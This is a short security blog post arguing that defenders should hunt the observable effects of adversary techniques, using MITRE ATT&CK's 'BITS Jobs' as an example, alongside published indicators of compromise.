Easy Security — Hunting IOCs or Effects?
Let’s Set the Scene
RSA once defined indicators of compromise (IOCs) as:
“…an artifact observed on a network or in an operating system that, with HIGH CONFIDENCE, indicating a computer intrusion.”
Analysts and defenders are often focused on hunting IOCs, and for a good reason. Whether that’s FireEye’s Mandiant or your favorite infosec person on Twitter, your threat intel platform delivers actionable data on the latest threat. You can now go and search for “bad” on your network, hoping you don’t find anything.
You see, if you hunt IOCs (which you should), you are operating under a considerable time lag. This lag is because another analyst or researcher had to release that IOC for public consideration, and those that only hunt IOCs will always be waiting for the next. Tracking down IOCs is an excellent practice to follow, but what if you went further? What if you hunted Effects in addition to IOCs.
The Lifecycle of an IOC
Modifying RSA’s definition of IOC, we can say that an effect is a measurable or observable artifact on a network or operating system. Using this definition, we can create a lifecycle that looks like the following.
Where to Find Artifacts for Effects?
My favorite resource by far is the MITRE ATT&CK Matrix. Hunting for evidence of effects that adversary tactics, techniques, and procedures (TTPs) generate is invaluable for developing your own defensive TTPs and going beyond just signatures and IOCs.
If we pick a random TTP such as “BITS Jobs” under Defense Evasion, we can get an example of sources of log data we might want to narrow in on.
Collecting those sources, we might begin to detect the malicious activity of that TTP without the need for targeted IOCs, possibly uncovering new ATP activity.
To help with this I’ve created posts on how to set up collecting network traffic and windows logs.
Conclusion
Above we quickly went over how Effects lead to IOCs, and why we should aim to detect both. I hope you found this post beneficial!
